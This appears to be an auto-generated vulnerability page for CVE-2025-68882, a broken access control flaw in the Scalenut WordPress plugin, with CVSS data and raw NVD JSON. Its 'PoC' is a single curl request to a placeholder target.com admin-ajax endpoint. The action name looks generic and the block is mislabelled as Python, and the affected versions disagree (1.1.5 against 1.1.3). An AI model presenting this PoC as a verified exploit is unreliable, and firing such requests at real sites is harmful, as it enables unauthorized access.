Security Vulnerability Report
中文
CVE-2025-68882 CVSS 7.5 HIGH

CVE-2025-68882

Published: 2026-01-22 17:16:13
Last Modified: 2026-04-27 19:16:37

Description

Missing Authorization vulnerability in Scalenut Scalenut scalenut allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Scalenut: from n/a through <= 1.1.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Scalenut WordPress Plugin <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
curl -X GET 'http://target.com/wp-admin/admin-ajax.php?action=scalenut_protected_action'

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68882", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:12.667", "lastModified": "2026-04-27T19:16:37.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Scalenut Scalenut scalenut allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Scalenut: from n/a through <= 1.1.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Scalenut Scalenut scalenut permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Scalenut: desde n/a hasta &lt;= 1.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/scalenut/vulnerability/wordpress-scalenut-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}